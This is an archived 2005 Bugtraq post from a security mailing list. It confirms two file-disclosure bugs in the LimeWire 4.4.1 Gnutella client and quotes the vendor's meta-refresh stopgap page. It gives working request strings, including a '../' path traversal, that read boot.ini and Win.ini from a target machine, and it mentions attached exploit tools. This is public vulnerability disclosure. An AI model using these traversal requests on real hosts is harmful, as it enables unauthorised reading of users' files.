lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 16 Mar 2005 14:39:43 -0500
From: Ill will <xillwillx@...il.com>
To: bugtraq@...urityfocus.com
Subject: Kevin Walsh: LimeWire Gnutella client two vulnerabilities

using limewire version 4.4.1 on windows
192.168.1.2:6346/gnutella/res/c\:boot.ini 
works perfectly fine
the magnet request
192.168.1.2/magnet10/../../../../../Windows/Win.ini?Simple-test
forwards you to a "fix" that they are using to patch all the new
version.. the simply put an index.html that meta-refresh forwards you
to their site

[html>
[head>
[title>Please Share</title>
[meta http-equiv="refresh" 
content="0; 
URL=http://www2.limewire.com/browser.htm">
[/head>
[body>
[a href="http://www2.limewire.com/browser.htm">Please Share[/a>
[/body>
[/html>

im also attaching to programs+ source  i wrote that either allow you
to read the files from the console
or download the file itself from the user

-- 
- illwill
http://illmob.org

Download attachment "limewire.rar" of type "application/rar" (5159 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ